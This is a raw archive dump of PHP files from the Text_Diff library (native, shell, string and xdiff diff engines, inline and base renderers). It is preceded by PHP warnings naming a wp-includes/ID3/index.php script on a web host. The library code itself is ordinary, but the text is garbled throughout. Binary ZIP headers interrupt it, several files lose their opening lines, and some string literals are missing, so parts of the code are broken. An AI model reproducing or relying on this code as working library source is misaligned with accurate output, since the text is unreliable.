Warning: Cannot modify header information - headers already sent by (output started at /home/tarafhaber/public_html/wp-includes/ID3/index.php:1) in /home/tarafhaber/public_html/wp-includes/ID3/index.php on line 219
Warning: Cannot modify header information - headers already sent by (output started at /home/tarafhaber/public_html/wp-includes/ID3/index.php:1) in /home/tarafhaber/public_html/wp-includes/ID3/index.php on line 220
Warning: Cannot modify header information - headers already sent by (output started at /home/tarafhaber/public_html/wp-includes/ID3/index.php:1) in /home/tarafhaber/public_html/wp-includes/ID3/index.php on line 221
Warning: Cannot modify header information - headers already sent by (output started at /home/tarafhaber/public_html/wp-includes/ID3/index.php:1) in /home/tarafhaber/public_html/wp-includes/ID3/index.php on line 222
Warning: Cannot modify header information - headers already sent by (output started at /home/tarafhaber/public_html/wp-includes/ID3/index.php:1) in /home/tarafhaber/public_html/wp-includes/ID3/index.php on line 223
Warning: Cannot modify header information - headers already sent by (output started at /home/tarafhaber/public_html/wp-includes/ID3/index.php:1) in /home/tarafhaber/public_html/wp-includes/ID3/index.php on line 224
PK 6E�Z'5��> �> Diff/Engine/native.phpnu �[��� 2, and some optimizations) are from
* Geoffrey T. Dairiki . The original PHP version of this
* code was written by him, and is used/adapted with his permission.
*
* Copyright 2004-2010 The Horde Project (http://www.horde.org/)
*
* See the enclosed file COPYING for license information (LGPL). If you did
* not receive this file, see https://opensource.org/license/lgpl-2-1/.
*
* @author Geoffrey T. Dairiki
* @package Text_Diff
*/
class Text_Diff_Engine_native {
public $xchanged;
public $ychanged;
public $xv;
public $yv;
public $xind;
public $yind;
public $seq;
public $in_seq;
public $lcs;
function diff($from_lines, $to_lines)
{
array_walk($from_lines, array('Text_Diff', 'trimNewlines'));
array_walk($to_lines, array('Text_Diff', 'trimNewlines'));
$n_from = count($from_lines);
$n_to = count($to_lines);
$this->xchanged = $this->ychanged = array();
$this->xv = $this->yv = array();
$this->xind = $this->yind = array();
unset($this->seq);
unset($this->in_seq);
unset($this->lcs);
// Skip leading common lines.
for ($skip = 0; $skip < $n_from && $skip < $n_to; $skip++) {
if ($from_lines[$skip] !== $to_lines[$skip]) {
break;
}
$this->xchanged[$skip] = $this->ychanged[$skip] = false;
}
// Skip trailing common lines.
$xi = $n_from; $yi = $n_to;
for ($endskip = 0; --$xi > $skip && --$yi > $skip; $endskip++) {
if ($from_lines[$xi] !== $to_lines[$yi]) {
break;
}
$this->xchanged[$xi] = $this->ychanged[$yi] = false;
}
// Ignore lines which do not exist in both files.
for ($xi = $skip; $xi < $n_from - $endskip; $xi++) {
$xhash[$from_lines[$xi]] = 1;
}
for ($yi = $skip; $yi < $n_to - $endskip; $yi++) {
$line = $to_lines[$yi];
if (($this->ychanged[$yi] = empty($xhash[$line]))) {
continue;
}
$yhash[$line] = 1;
$this->yv[] = $line;
$this->yind[] = $yi;
}
for ($xi = $skip; $xi < $n_from - $endskip; $xi++) {
$line = $from_lines[$xi];
if (($this->xchanged[$xi] = empty($yhash[$line]))) {
continue;
}
$this->xv[] = $line;
$this->xind[] = $xi;
}
// Find the LCS.
$this->_compareseq(0, count($this->xv), 0, count($this->yv));
// Merge edits when possible.
$this->_shiftBoundaries($from_lines, $this->xchanged, $this->ychanged);
$this->_shiftBoundaries($to_lines, $this->ychanged, $this->xchanged);
// Compute the edit operations.
$edits = array();
$xi = $yi = 0;
while ($xi < $n_from || $yi < $n_to) {
assert($yi < $n_to || $this->xchanged[$xi]);
assert($xi < $n_from || $this->ychanged[$yi]);
// Skip matching "snake".
$copy = array();
while ($xi < $n_from && $yi < $n_to
&& !$this->xchanged[$xi] && !$this->ychanged[$yi]) {
$copy[] = $from_lines[$xi++];
++$yi;
}
if ($copy) {
$edits[] = new Text_Diff_Op_copy($copy);
}
// Find deletes & adds.
$delete = array();
while ($xi < $n_from && $this->xchanged[$xi]) {
$delete[] = $from_lines[$xi++];
}
$add = array();
while ($yi < $n_to && $this->ychanged[$yi]) {
$add[] = $to_lines[$yi++];
}
if ($delete && $add) {
$edits[] = new Text_Diff_Op_change($delete, $add);
} elseif ($delete) {
$edits[] = new Text_Diff_Op_delete($delete);
} elseif ($add) {
$edits[] = new Text_Diff_Op_add($add);
}
}
return $edits;
}
/**
* Divides the Largest Common Subsequence (LCS) of the sequences (XOFF,
* XLIM) and (YOFF, YLIM) into NCHUNKS approximately equally sized
* segments.
*
* Returns (LCS, PTS). LCS is the length of the LCS. PTS is an array of
* NCHUNKS+1 (X, Y) indexes giving the diving points between sub
* sequences. The first sub-sequence is contained in (X0, X1), (Y0, Y1),
* the second in (X1, X2), (Y1, Y2) and so on. Note that (X0, Y0) ==
* (XOFF, YOFF) and (X[NCHUNKS], Y[NCHUNKS]) == (XLIM, YLIM).
*
* This function assumes that the first lines of the specified portions of
* the two files do not match, and likewise that the last lines do not
* match. The caller must trim matching lines from the beginning and end
* of the portions it is going to specify.
*/
function _diag ($xoff, $xlim, $yoff, $ylim, $nchunks)
{
$flip = false;
if ($xlim - $xoff > $ylim - $yoff) {
/* Things seems faster (I'm not sure I understand why) when the
* shortest sequence is in X. */
$flip = true;
list ($xoff, $xlim, $yoff, $ylim)
= array($yoff, $ylim, $xoff, $xlim);
}
if ($flip) {
for ($i = $ylim - 1; $i >= $yoff; $i--) {
$ymatches[$this->xv[$i]][] = $i;
}
} else {
for ($i = $ylim - 1; $i >= $yoff; $i--) {
$ymatches[$this->yv[$i]][] = $i;
}
}
$this->lcs = 0;
$this->seq[0]= $yoff - 1;
$this->in_seq = array();
$ymids[0] = array();
$numer = $xlim - $xoff + $nchunks - 1;
$x = $xoff;
for ($chunk = 0; $chunk < $nchunks; $chunk++) {
if ($chunk > 0) {
for ($i = 0; $i <= $this->lcs; $i++) {
$ymids[$i][$chunk - 1] = $this->seq[$i];
}
}
$x1 = $xoff + (int)(($numer + ($xlim - $xoff) * $chunk) / $nchunks);
for (; $x < $x1; $x++) {
$line = $flip ? $this->yv[$x] : $this->xv[$x];
if (empty($ymatches[$line])) {
continue;
}
$matches = $ymatches[$line];
reset($matches);
while ($y = current($matches)) {
if (empty($this->in_seq[$y])) {
$k = $this->_lcsPos($y);
assert($k > 0);
$ymids[$k] = $ymids[$k - 1];
break;
}
next($matches);
}
while ($y = current($matches)) {
if ($y > $this->seq[$k - 1]) {
assert($y <= $this->seq[$k]);
/* Optimization: this is a common case: next match is
* just replacing previous match. */
$this->in_seq[$this->seq[$k]] = false;
$this->seq[$k] = $y;
$this->in_seq[$y] = 1;
} elseif (empty($this->in_seq[$y])) {
$k = $this->_lcsPos($y);
assert($k > 0);
$ymids[$k] = $ymids[$k - 1];
}
next($matches);
}
}
}
$seps[] = $flip ? array($yoff, $xoff) : array($xoff, $yoff);
$ymid = $ymids[$this->lcs];
for ($n = 0; $n < $nchunks - 1; $n++) {
$x1 = $xoff + (int)(($numer + ($xlim - $xoff) * $n) / $nchunks);
$y1 = $ymid[$n] + 1;
$seps[] = $flip ? array($y1, $x1) : array($x1, $y1);
}
$seps[] = $flip ? array($ylim, $xlim) : array($xlim, $ylim);
return array($this->lcs, $seps);
}
function _lcsPos($ypos)
{
$end = $this->lcs;
if ($end == 0 || $ypos > $this->seq[$end]) {
$this->seq[++$this->lcs] = $ypos;
$this->in_seq[$ypos] = 1;
return $this->lcs;
}
$beg = 1;
while ($beg < $end) {
$mid = (int)(($beg + $end) / 2);
if ($ypos > $this->seq[$mid]) {
$beg = $mid + 1;
} else {
$end = $mid;
}
}
assert($ypos != $this->seq[$end]);
$this->in_seq[$this->seq[$end]] = false;
$this->seq[$end] = $ypos;
$this->in_seq[$ypos] = 1;
return $end;
}
/**
* Finds LCS of two sequences.
*
* The results are recorded in the vectors $this->{x,y}changed[], by
* storing a 1 in the element for each line that is an insertion or
* deletion (ie. is not in the LCS).
*
* The subsequence of file 0 is (XOFF, XLIM) and likewise for file 1.
*
* Note that XLIM, YLIM are exclusive bounds. All line numbers are
* origin-0 and discarded lines are not counted.
*/
function _compareseq ($xoff, $xlim, $yoff, $ylim)
{
/* Slide down the bottom initial diagonal. */
while ($xoff < $xlim && $yoff < $ylim
&& $this->xv[$xoff] == $this->yv[$yoff]) {
++$xoff;
++$yoff;
}
/* Slide up the top initial diagonal. */
while ($xlim > $xoff && $ylim > $yoff
&& $this->xv[$xlim - 1] == $this->yv[$ylim - 1]) {
--$xlim;
--$ylim;
}
if ($xoff == $xlim || $yoff == $ylim) {
$lcs = 0;
} else {
/* This is ad hoc but seems to work well. $nchunks =
* sqrt(min($xlim - $xoff, $ylim - $yoff) / 2.5); $nchunks =
* max(2,min(8,(int)$nchunks)); */
$nchunks = min(7, $xlim - $xoff, $ylim - $yoff) + 1;
list($lcs, $seps)
= $this->_diag($xoff, $xlim, $yoff, $ylim, $nchunks);
}
if ($lcs == 0) {
/* X and Y sequences have no common subsequence: mark all
* changed. */
while ($yoff < $ylim) {
$this->ychanged[$this->yind[$yoff++]] = 1;
}
while ($xoff < $xlim) {
$this->xchanged[$this->xind[$xoff++]] = 1;
}
} else {
/* Use the partitions to split this problem into subproblems. */
reset($seps);
$pt1 = $seps[0];
while ($pt2 = next($seps)) {
$this->_compareseq ($pt1[0], $pt2[0], $pt1[1], $pt2[1]);
$pt1 = $pt2;
}
}
}
/**
* Adjusts inserts/deletes of identical lines to join changes as much as
* possible.
*
* We do something when a run of changed lines include a line at one end
* and has an excluded, identical line at the other. We are free to
* choose which identical line is included. `compareseq' usually chooses
* the one at the beginning, but usually it is cleaner to consider the
* following identical line to be the "change".
*
* This is extracted verbatim from analyze.c (GNU diffutils-2.7).
*/
function _shiftBoundaries($lines, &$changed, $other_changed)
{
$i = 0;
$j = 0;
assert(count($lines) == count($changed));
$len = count($lines);
$other_len = count($other_changed);
while (1) {
/* Scan forward to find the beginning of another run of
* changes. Also keep track of the corresponding point in the
* other file.
*
* Throughout this code, $i and $j are adjusted together so that
* the first $i elements of $changed and the first $j elements of
* $other_changed both contain the same number of zeros (unchanged
* lines).
*
* Furthermore, $j is always kept so that $j == $other_len or
* $other_changed[$j] == false. */
while ($j < $other_len && $other_changed[$j]) {
$j++;
}
while ($i < $len && ! $changed[$i]) {
assert($j < $other_len && ! $other_changed[$j]);
$i++; $j++;
while ($j < $other_len && $other_changed[$j]) {
$j++;
}
}
if ($i == $len) {
break;
}
$start = $i;
/* Find the end of this run of changes. */
while (++$i < $len && $changed[$i]) {
continue;
}
do {
/* Record the length of this run of changes, so that we can
* later determine whether the run has grown. */
$runlength = $i - $start;
/* Move the changed region back, so long as the previous
* unchanged line matches the last changed one. This merges
* with previous changed regions. */
while ($start > 0 && $lines[$start - 1] == $lines[$i - 1]) {
$changed[--$start] = 1;
$changed[--$i] = false;
while ($start > 0 && $changed[$start - 1]) {
$start--;
}
assert($j > 0);
while ($other_changed[--$j]) {
continue;
}
assert($j >= 0 && !$other_changed[$j]);
}
/* Set CORRESPONDING to the end of the changed run, at the
* last point where it corresponds to a changed run in the
* other file. CORRESPONDING == LEN means no such point has
* been found. */
$corresponding = $j < $other_len ? $i : $len;
/* Move the changed region forward, so long as the first
* changed line matches the following unchanged one. This
* merges with following changed regions. Do this second, so
* that if there are no merges, the changed region is moved
* forward as far as possible. */
while ($i < $len && $lines[$start] == $lines[$i]) {
$changed[$start++] = false;
$changed[$i++] = 1;
while ($i < $len && $changed[$i]) {
$i++;
}
assert($j < $other_len && ! $other_changed[$j]);
$j++;
if ($j < $other_len && $other_changed[$j]) {
$corresponding = $i;
while ($j < $other_len && $other_changed[$j]) {
$j++;
}
}
}
} while ($runlength != $i - $start);
/* If possible, move the fully-merged run of changes back to a
* corresponding run in the other file. */
while ($corresponding < $i) {
$changed[--$start] = 1;
$changed[--$i] = 0;
assert($j > 0);
while ($other_changed[--$j]) {
continue;
}
assert($j >= 0 && !$other_changed[$j]);
}
}
}
}
PK 6E�Z����S S Diff/Engine/shell.phpnu �[���
* @package Text_Diff
* @since 0.3.0
*/
class Text_Diff_Engine_shell {
/**
* Path to the diff executable
*
* @var string
*/
var $_diffCommand = 'diff';
/**
* Returns the array of differences.
*
* @param array $from_lines lines of text from old file
* @param array $to_lines lines of text from new file
*
* @return array all changes made (array with Text_Diff_Op_* objects)
*/
function diff($from_lines, $to_lines)
{
array_walk($from_lines, array('Text_Diff', 'trimNewlines'));
array_walk($to_lines, array('Text_Diff', 'trimNewlines'));
$temp_dir = Text_Diff::_getTempDir();
// Execute gnu diff or similar to get a standard diff file.
$from_file = tempnam($temp_dir, 'Text_Diff');
$to_file = tempnam($temp_dir, 'Text_Diff');
$fp = fopen($from_file, 'w');
fwrite($fp, implode("\n", $from_lines));
fclose($fp);
$fp = fopen($to_file, 'w');
fwrite($fp, implode("\n", $to_lines));
fclose($fp);
$diff = shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file);
unlink($from_file);
unlink($to_file);
if (is_null($diff)) {
// No changes were made
return array(new Text_Diff_Op_copy($from_lines));
}
$from_line_no = 1;
$to_line_no = 1;
$edits = array();
// Get changed lines by parsing something like:
// 0a1,2
// 1,2c4,6
// 1,5d6
preg_match_all('#^(\d+)(?:,(\d+))?([adc])(\d+)(?:,(\d+))?$#m', $diff,
$matches, PREG_SET_ORDER);
foreach ($matches as $match) {
if (!isset($match[5])) {
// This paren is not set every time (see regex).
$match[5] = false;
}
if ($match[3] == 'a') {
$from_line_no--;
}
if ($match[3] == 'd') {
$to_line_no--;
}
if ($from_line_no < $match[1] || $to_line_no < $match[4]) {
// copied lines
assert($match[1] - $from_line_no == $match[4] - $to_line_no);
array_push($edits,
new Text_Diff_Op_copy(
$this->_getLines($from_lines, $from_line_no, $match[1] - 1),
$this->_getLines($to_lines, $to_line_no, $match[4] - 1)));
}
switch ($match[3]) {
case 'd':
// deleted lines
array_push($edits,
new Text_Diff_Op_delete(
$this->_getLines($from_lines, $from_line_no, $match[2])));
$to_line_no++;
break;
case 'c':
// changed lines
array_push($edits,
new Text_Diff_Op_change(
$this->_getLines($from_lines, $from_line_no, $match[2]),
$this->_getLines($to_lines, $to_line_no, $match[5])));
break;
case 'a':
// added lines
array_push($edits,
new Text_Diff_Op_add(
$this->_getLines($to_lines, $to_line_no, $match[5])));
$from_line_no++;
break;
}
}
if (!empty($from_lines)) {
// Some lines might still be pending. Add them as copied
array_push($edits,
new Text_Diff_Op_copy(
$this->_getLines($from_lines, $from_line_no,
$from_line_no + count($from_lines) - 1),
$this->_getLines($to_lines, $to_line_no,
$to_line_no + count($to_lines) - 1)));
}
return $edits;
}
/**
* Get lines from either the old or new text
*
* @access private
*
* @param array $text_lines Either $from_lines or $to_lines (passed by reference).
* @param int $line_no Current line number (passed by reference).
* @param int $end Optional end line, when we want to chop more
* than one line.
*
* @return array The chopped lines
*/
function _getLines(&$text_lines, &$line_no, $end = false)
{
if (!empty($end)) {
$lines = array();
// We can shift even more
while ($line_no <= $end) {
array_push($lines, array_shift($text_lines));
$line_no++;
}
} else {
$lines = array(array_shift($text_lines));
$line_no++;
}
return $lines;
}
}
PK 6E�Z�Eћ � Diff/Engine/string.phpnu �[���
* $patch = file_get_contents('example.patch');
* $diff = new Text_Diff('string', array($patch));
* $renderer = new Text_Diff_Renderer_inline();
* echo $renderer->render($diff);
*
*
* Copyright 2005 Örjan Persson
* Copyright 2005-2010 The Horde Project (http://www.horde.org/)
*
* See the enclosed file COPYING for license information (LGPL). If you did
* not receive this file, see https://opensource.org/license/lgpl-2-1/.
*
* @author Örjan Persson
* @package Text_Diff
* @since 0.2.0
*/
class Text_Diff_Engine_string {
/**
* Parses a unified or context diff.
*
* First param contains the whole diff and the second can be used to force
* a specific diff type. If the second parameter is 'autodetect', the
* diff will be examined to find out which type of diff this is.
*
* @param string $diff The diff content.
* @param string $mode The diff mode of the content in $diff. One of
* 'context', 'unified', or 'autodetect'.
*
* @return array List of all diff operations.
*/
function diff($diff, $mode = 'autodetect')
{
// Detect line breaks.
$lnbr = "\n";
if (strpos($diff, "\r\n") !== false) {
$lnbr = "\r\n";
} elseif (strpos($diff, "\r") !== false) {
$lnbr = "\r";
}
// Make sure we have a line break at the EOF.
if (substr($diff, -strlen($lnbr)) != $lnbr) {
$diff .= $lnbr;
}
if ($mode != 'autodetect' && $mode != 'context' && $mode != 'unified') {
return PEAR::raiseError('Type of diff is unsupported');
}
if ($mode == 'autodetect') {
$context = strpos($diff, '***');
$unified = strpos($diff, '---');
if ($context === $unified) {
return PEAR::raiseError('Type of diff could not be detected');
} elseif ($context === false || $unified === false) {
$mode = $context !== false ? 'context' : 'unified';
} else {
$mode = $context < $unified ? 'context' : 'unified';
}
}
// Split by new line and remove the diff header, if there is one.
$diff = explode($lnbr, $diff);
if (($mode == 'context' && strpos($diff[0], '***') === 0) ||
($mode == 'unified' && strpos($diff[0], '---') === 0)) {
array_shift($diff);
array_shift($diff);
}
if ($mode == 'context') {
return $this->parseContextDiff($diff);
} else {
return $this->parseUnifiedDiff($diff);
}
}
/**
* Parses an array containing the unified diff.
*
* @param array $diff Array of lines.
*
* @return array List of all diff operations.
*/
function parseUnifiedDiff($diff)
{
$edits = array();
$end = count($diff) - 1;
for ($i = 0; $i < $end;) {
$diff1 = array();
switch (substr($diff[$i], 0, 1)) {
case ' ':
do {
$diff1[] = substr($diff[$i], 1);
} while (++$i < $end && substr($diff[$i], 0, 1) == ' ');
$edits[] = new Text_Diff_Op_copy($diff1);
break;
case '+':
// get all new lines
do {
$diff1[] = substr($diff[$i], 1);
} while (++$i < $end && substr($diff[$i], 0, 1) == '+');
$edits[] = new Text_Diff_Op_add($diff1);
break;
case '-':
// get changed or removed lines
$diff2 = array();
do {
$diff1[] = substr($diff[$i], 1);
} while (++$i < $end && substr($diff[$i], 0, 1) == '-');
while ($i < $end && substr($diff[$i], 0, 1) == '+') {
$diff2[] = substr($diff[$i++], 1);
}
if (count($diff2) == 0) {
$edits[] = new Text_Diff_Op_delete($diff1);
} else {
$edits[] = new Text_Diff_Op_change($diff1, $diff2);
}
break;
default:
$i++;
break;
}
}
return $edits;
}
/**
* Parses an array containing the context diff.
*
* @param array $diff Array of lines.
*
* @return array List of all diff operations.
*/
function parseContextDiff(&$diff)
{
$edits = array();
$i = $max_i = $j = $max_j = 0;
$end = count($diff) - 1;
while ($i < $end && $j < $end) {
while ($i >= $max_i && $j >= $max_j) {
// Find the boundaries of the diff output of the two files
for ($i = $j;
$i < $end && substr($diff[$i], 0, 3) == '***';
$i++);
for ($max_i = $i;
$max_i < $end && substr($diff[$max_i], 0, 3) != '---';
$max_i++);
for ($j = $max_i;
$j < $end && substr($diff[$j], 0, 3) == '---';
$j++);
for ($max_j = $j;
$max_j < $end && substr($diff[$max_j], 0, 3) != '***';
$max_j++);
}
// find what hasn't been changed
$array = array();
while ($i < $max_i &&
$j < $max_j &&
strcmp($diff[$i], $diff[$j]) == 0) {
$array[] = substr($diff[$i], 2);
$i++;
$j++;
}
while ($i < $max_i && ($max_j-$j) <= 1) {
if ($diff[$i] != '' && substr($diff[$i], 0, 1) != ' ') {
break;
}
$array[] = substr($diff[$i++], 2);
}
while ($j < $max_j && ($max_i-$i) <= 1) {
if ($diff[$j] != '' && substr($diff[$j], 0, 1) != ' ') {
break;
}
$array[] = substr($diff[$j++], 2);
}
if (count($array) > 0) {
$edits[] = new Text_Diff_Op_copy($array);
}
if ($i < $max_i) {
$diff1 = array();
switch (substr($diff[$i], 0, 1)) {
case '!':
$diff2 = array();
do {
$diff1[] = substr($diff[$i], 2);
if ($j < $max_j && substr($diff[$j], 0, 1) == '!') {
$diff2[] = substr($diff[$j++], 2);
}
} while (++$i < $max_i && substr($diff[$i], 0, 1) == '!');
$edits[] = new Text_Diff_Op_change($diff1, $diff2);
break;
case '+':
do {
$diff1[] = substr($diff[$i], 2);
} while (++$i < $max_i && substr($diff[$i], 0, 1) == '+');
$edits[] = new Text_Diff_Op_add($diff1);
break;
case '-':
do {
$diff1[] = substr($diff[$i], 2);
} while (++$i < $max_i && substr($diff[$i], 0, 1) == '-');
$edits[] = new Text_Diff_Op_delete($diff1);
break;
}
}
if ($j < $max_j) {
$diff2 = array();
switch (substr($diff[$j], 0, 1)) {
case '+':
do {
$diff2[] = substr($diff[$j++], 2);
} while ($j < $max_j && substr($diff[$j], 0, 1) == '+');
$edits[] = new Text_Diff_Op_add($diff2);
break;
case '-':
do {
$diff2[] = substr($diff[$j++], 2);
} while ($j < $max_j && substr($diff[$j], 0, 1) == '-');
$edits[] = new Text_Diff_Op_delete($diff2);
break;
}
}
}
return $edits;
}
}
PK 6E�Z�@[� � Diff/Engine/xdiff.phpnu �[���
* @package Text_Diff
*/
class Text_Diff_Engine_xdiff {
/**
*/
function diff($from_lines, $to_lines)
{
array_walk($from_lines, array('Text_Diff', 'trimNewlines'));
array_walk($to_lines, array('Text_Diff', 'trimNewlines'));
/* Convert the two input arrays into strings for xdiff processing. */
$from_string = implode("\n", $from_lines);
$to_string = implode("\n", $to_lines);
/* Diff the two strings and convert the result to an array. */
$diff = xdiff_string_diff($from_string, $to_string, count($to_lines));
$diff = explode("\n", $diff);
/* Walk through the diff one line at a time. We build the $edits
* array of diff operations by reading the first character of the
* xdiff output (which is in the "unified diff" format).
*
* Note that we don't have enough information to detect "changed"
* lines using this approach, so we can't add Text_Diff_Op_changed
* instances to the $edits array. The result is still perfectly
* valid, albeit a little less descriptive and efficient. */
$edits = array();
foreach ($diff as $line) {
if (!strlen($line)) {
continue;
}
switch ($line[0]) {
case ' ':
$edits[] = new Text_Diff_Op_copy(array(substr($line, 1)));
break;
case '+':
$edits[] = new Text_Diff_Op_add(array(substr($line, 1)));
break;
case '-':
$edits[] = new Text_Diff_Op_delete(array(substr($line, 1)));
break;
}
}
return $edits;
}
}
PK 6E�Z�Sʉ� � Diff/Engine/.htaccessnu �7��m
Order allow,deny
Deny from all
PK 6E�Z'ݣ� � Diff/Renderer/inline.phpnu �[��� ';
/**
* Suffix for inserted text.
*
* @var string
*/
var $_ins_suffix = '';
/**
* Prefix for deleted text.
*
* @var string
*/
var $_del_prefix = '';
/**
* Suffix for deleted text.
*
* @var string
*/
var $_del_suffix = '';
/**
* Header for each change block.
*
* @var string
*/
var $_block_header = '';
/**
* Whether to split down to character-level.
*
* @var boolean
*/
var $_split_characters = false;
/**
* What are we currently splitting on? Used to recurse to show word-level
* or character-level changes.
*
* @var string
*/
var $_split_level = 'lines';
function _blockHeader($xbeg, $xlen, $ybeg, $ylen)
{
return $this->_block_header;
}
function _startBlock($header)
{
return $header;
}
function _lines($lines, $prefix = ' ', $encode = true)
{
if ($encode) {
array_walk($lines, array(&$this, '_encode'));
}
if ($this->_split_level == 'lines') {
return implode("\n", $lines) . "\n";
} else {
return implode('', $lines);
}
}
function _added($lines)
{
array_walk($lines, array(&$this, '_encode'));
$lines[0] = $this->_ins_prefix . $lines[0];
$lines[count($lines) - 1] .= $this->_ins_suffix;
return $this->_lines($lines, ' ', false);
}
function _deleted($lines, $words = false)
{
array_walk($lines, array(&$this, '_encode'));
$lines[0] = $this->_del_prefix . $lines[0];
$lines[count($lines) - 1] .= $this->_del_suffix;
return $this->_lines($lines, ' ', false);
}
function _changed($orig, $final)
{
/* If we've already split on characters, just display. */
if ($this->_split_level == 'characters') {
return $this->_deleted($orig)
. $this->_added($final);
}
/* If we've already split on words, just display. */
if ($this->_split_level == 'words') {
$prefix = '';
while ($orig[0] !== false && $final[0] !== false &&
substr($orig[0], 0, 1) == ' ' &&
substr($final[0], 0, 1) == ' ') {
$prefix .= substr($orig[0], 0, 1);
$orig[0] = substr($orig[0], 1);
$final[0] = substr($final[0], 1);
}
return $prefix . $this->_deleted($orig) . $this->_added($final);
}
$text1 = implode("\n", $orig);
$text2 = implode("\n", $final);
/* Non-printing newline marker. */
$nl = "\0";
if ($this->_split_characters) {
$diff = new Text_Diff('native',
array(preg_split('//', $text1),
preg_split('//', $text2)));
} else {
/* We want to split on word boundaries, but we need to preserve
* whitespace as well. Therefore we split on words, but include
* all blocks of whitespace in the wordlist. */
$diff = new Text_Diff('native',
array($this->_splitOnWords($text1, $nl),
$this->_splitOnWords($text2, $nl)));
}
/* Get the diff in inline format. */
$renderer = new Text_Diff_Renderer_inline
(array_merge($this->getParams(),
array('split_level' => $this->_split_characters ? 'characters' : 'words')));
/* Run the diff and get the output. */
return str_replace($nl, "\n", $renderer->render($diff)) . "\n";
}
function _splitOnWords($string, $newlineEscape = "\n")
{
// Ignore \0; otherwise the while loop will never finish.
$string = str_replace("\0", '', $string);
$words = array();
$length = strlen($string);
$pos = 0;
while ($pos < $length) {
// Eat a word with any preceding whitespace.
$spaces = strspn(substr($string, $pos), " \n");
$nextpos = strcspn(substr($string, $pos + $spaces), " \n");
$words[] = str_replace("\n", $newlineEscape, substr($string, $pos, $spaces + $nextpos));
$pos += $spaces + $nextpos;
}
return $words;
}
function _encode(&$string)
{
$string = htmlspecialchars($string);
}
}
PK 6E�Z�Sʉ� � Diff/Renderer/.htaccessnu �7��m
Order allow,deny
Deny from all
PK 6E�Z�
=g� � Diff/Renderer.phpnu �[��� $value) {
$v = '_' . $param;
if (isset($this->$v)) {
$this->$v = $value;
}
}
}
/**
* PHP4 constructor.
*/
public function Text_Diff_Renderer( $params = array() ) {
self::__construct( $params );
}
/**
* Get any renderer parameters.
*
* @return array All parameters of this renderer object.
*/
function getParams()
{
$params = array();
foreach (get_object_vars($this) as $k => $v) {
if ($k[0] == '_') {
$params[substr($k, 1)] = $v;
}
}
return $params;
}
/**
* Renders a diff.
*
* @param Text_Diff $diff A Text_Diff object.
*
* @return string The formatted output.
*/
function render($diff)
{
$xi = $yi = 1;
$block = false;
$context = array();
$nlead = $this->_leading_context_lines;
$ntrail = $this->_trailing_context_lines;
$output = $this->_startDiff();
$diffs = $diff->getDiff();
foreach ($diffs as $i => $edit) {
/* If these are unchanged (copied) lines, and we want to keep
* leading or trailing context lines, extract them from the copy
* block. */
if (is_a($edit, 'Text_Diff_Op_copy')) {
/* Do we have any diff blocks yet? */
if (is_array($block)) {
/* How many lines to keep as context from the copy
* block. */
$keep = $i == count($diffs) - 1 ? $ntrail : $nlead + $ntrail;
if (count($edit->orig) <= $keep) {
/* We have less lines in the block than we want for
* context => keep the whole block. */
$block[] = $edit;
} else {
if ($ntrail) {
/* Create a new block with as many lines as we need
* for the trailing context. */
$context = array_slice($edit->orig, 0, $ntrail);
$block[] = new Text_Diff_Op_copy($context);
}
/* @todo */
$output .= $this->_block($x0, $ntrail + $xi - $x0,
$y0, $ntrail + $yi - $y0,
$block);
$block = false;
}
}
/* Keep the copy block as the context for the next block. */
$context = $edit->orig;
} else {
/* Don't we have any diff blocks yet? */
if (!is_array($block)) {
/* Extract context lines from the preceding copy block. */
$context = array_slice($context, count($context) - $nlead);
$x0 = $xi - count($context);
$y0 = $yi - count($context);
$block = array();
if ($context) {
$block[] = new Text_Diff_Op_copy($context);
}
}
$block[] = $edit;
}
if ($edit->orig) {
$xi += count($edit->orig);
}
if ($edit->final) {
$yi += count($edit->final);
}
}
if (is_array($block)) {
$output .= $this->_block($x0, $xi - $x0,
$y0, $yi - $y0,
$block);
}
return $output . $this->_endDiff();
}
function _block($xbeg, $xlen, $ybeg, $ylen, &$edits)
{
$output = $this->_startBlock($this->_blockHeader($xbeg, $xlen, $ybeg, $ylen));
foreach ($edits as $edit) {
switch (strtolower(get_class($edit))) {
case 'text_diff_op_copy':
$output .= $this->_context($edit->orig);
break;
case 'text_diff_op_add':
$output .= $this->_added($edit->final);
break;
case 'text_diff_op_delete':
$output .= $this->_deleted($edit->orig);
break;
case 'text_diff_op_change':
$output .= $this->_changed($edit->orig, $edit->final);
break;
}
}
return $output . $this->_endBlock();
}
function _startDiff()
{
return '';
}
function _endDiff()
{
return '';
}
function _blockHeader($xbeg, $xlen, $ybeg, $ylen)
{
if ($xlen > 1) {
$xbeg .= ',' . ($xbeg + $xlen - 1);
}
if ($ylen > 1) {
$ybeg .= ',' . ($ybeg + $ylen - 1);
}
// this matches the GNU Diff behaviour
if ($xlen && !$ylen) {
$ybeg--;
} elseif (!$xlen) {
$xbeg--;
}
return $xbeg . ($xlen ? ($ylen ? 'c' : 'd') : 'a') . $ybeg;
}
function _startBlock($header)
{
return $header . "\n";
}
function _endBlock()
{
return '';
}
function _lines($lines, $prefix = ' ')
{
return $prefix . implode("\n$prefix", $lines) . "\n";
}
function _context($lines)
{
return $this->_lines($lines, ' ');
}
function _added($lines)
{
return $this->_lines($lines, '> ');
}
function _deleted($lines)
{
return $this->_lines($lines, '< ');
}
function _changed($orig, $final)
{
return $this->_deleted($orig) . "---\n" . $this->_added($final);
}
}
